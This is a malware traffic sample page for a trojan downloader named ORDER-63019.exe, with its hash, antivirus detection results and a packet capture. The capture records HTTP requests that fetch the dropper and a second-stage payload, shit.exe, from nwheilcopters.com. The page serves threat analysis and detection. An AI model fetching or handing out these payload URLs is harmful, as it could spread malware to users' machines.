ORDER-63019.exe shit.exe nwheilcopters.com Malware Trojan Downloader Dropper PCAP File Download Traffic Sample

SHA256: 98bdbffa8d88d541f578597f218b3e2f2439ee736c0413cbe654b007d152a4bc
File name: ORDER-63019.exe
Detection ratio: 46 / 60
Analysis date: 2017-06-06 01:24:16 UTC
Engine            Result                                  Update
Arcabit           Trojan.Coantor.47                       20170606
Avast             Win32:Malware-gen                       20170606
AVG               Generic_vb.PMG                          20170605
Avira (no cloud)  TR/Dropper.VB.arvtb                     20170605
AVware            Trojan.Win32.Generic!BT                 20170606
BitDefender       Gen:Variant.Coantor.47                  20170606
CAT-QuickHeal     Trojan.Dynamer                          20170605
Cyren             W32/VBInject.JS.gen!Eldorado            20170606
DrWeb             Trojan.PWS.Stealer.1932                 20170606
Emsisoft          Gen:Variant.Coantor.47 (B)              20170606
Endgame           malicious (high confidence)             20170515
ESET-NOD32        a variant of Win32/Injector.DOVE        20170606
F-Prot            W32/VBInject.JS.gen!Eldorado            20170606
F-Secure          Gen:Variant.Coantor.47                  20170606
Fortinet          W32/Injector.DOVR!tr                    20170606
GData             Gen:Variant.Coantor.47                  20170606
2017-06-05 17:41:53.468218 IP 192.168.1.102.63854 > 108.170.51.58.80: Flags [P.], seq 0:411, ack 1, win 256, length 411: HTTP: GET /pdff/ORDER-63019.exe HTTP/1.1
E...='@...Z....fl.3:.n.P..-b....P.......GET /pdff/ORDER-63019.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: nwheilcopters.com
Connection: Keep-Alive
2017-06-05 17:42:51.810573 IP 192.168.1.102.59081 > 75.75.75.75.53: 17942+ A? nwheilcopters.com. (35)
E..?.......M...fKKKK...5.+W F............nwheilcopters.com.....
2017-06-05 17:42:51.986243 IP 192.168.1.102.63856 > 108.170.51.58.80: Flags [S], seq 842477748, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4=t@...[]...fl.3:.p.P270....... ..q..............
2017-06-05 17:42:52.082609 IP 192.168.1.102.63856 > 108.170.51.58.80: Flags [.], ack 1465304046, win 256, length 0
E..(=u@...[h...fl.3:.p.P270.WV..P..............
2017-06-05 17:42:52.089724 IP 192.168.1.102.63856 > 108.170.51.58.80: Flags [P.], seq 0:188, ack 1, win 256, length 188: HTTP: GET /chuksjamil/shit.exe HTTP/1.0
E...=v@...Z....fl.3:.p.P270.WV..P...B0..GET /chuksjamil/shit.exe HTTP/1.0
Host: nwheilcopters.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

2017-06-05 17:45:26.663212 IP 192.168.1.102.54601 > 40.77.229.75.443: Flags [P.], seq 234:351, ack 299, win 258, length 117
E.....@........f(M.K.I..n...j.9.P...B.......p.8.ELb.M....b|W+....@.........e~\...]..(......`...c.a..!.k.....G..C\......t...$..o..:..M.h{.&......|.%.a]...ms..
2017-06-05 17:45:26.809857 IP 192.168.1.102.54601 > 40.77.229.75.443: Flags [.], ack 448, win 257, length 0
E..(..@....,...f(M.K.I..n...j.9.P..............